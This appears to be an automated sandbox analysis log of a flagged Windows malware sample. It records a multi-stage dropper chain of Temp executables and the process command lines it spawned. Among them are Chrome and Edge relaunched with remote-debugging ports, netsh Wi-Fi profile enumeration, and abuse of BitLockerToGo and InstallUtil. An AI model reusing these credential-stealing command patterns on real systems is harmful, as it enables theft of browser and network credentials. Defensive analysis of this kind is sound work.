Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"

Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Y71AV1VIPLT8Y663WBDXSB.exe, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: i8Vwc7iOaG.exe, 00000000.00000003.2132372408.00000000059BE000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2132051161.00000000059D9000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2155437419.00000000059C5000.00000004.00000800.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2155437419.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2856670241.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000003.2718055528.0000000005715000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164200586.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3157446501.0000000005826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: i8Vwc7iOaG.exe	ReversingLabs: Detection: 57%
Source: i8Vwc7iOaG.exe	Virustotal: Detection: 63%

Source: Y71AV1VIPLT8Y663WBDXSB.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe

File read: C:\Users\user\Desktop\i8Vwc7iOaG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\i8Vwc7iOaG.exe "C:\Users\user\Desktop\i8Vwc7iOaG.exe"
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process created: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe "C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe"
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process created: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe "C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe"
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2228,i,8136523898456427104,7665852978689439012,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,1031345555997666430,10718117645205196851,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2156,i,5924171307802308355,13016151370304266811,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\FIJECAEHJJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\FIJECAEHJJ.exe "C:\Users\user\Documents\FIJECAEHJJ.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe "C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe "C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe "C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe"
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe "C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe "C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2600 --field-trial-handle=2568,i,14958645469672298584,2939773364007336378,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Process created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe "C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2172,i,12041411558634704463,13499998524665998635,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2092,i,2243381234690523858,16077404214973868286,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Process created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process created: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe "C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process created: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe "C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\FIJECAEHJJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2228,i,8136523898456427104,7665852978689439012,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe "C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe "C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe "C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe "C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe "C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe "C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe "C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,1031345555997666430,10718117645205196851,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2156,i,5924171307802308355,13016151370304266811,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\FIJECAEHJJ.exe "C:\Users\user\Documents\FIJECAEHJJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: unknown unknown
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2600 --field-trial-handle=2568,i,14958645469672298584,2939773364007336378,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Process created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe "C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2172,i,12041411558634704463,13499998524665998635,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
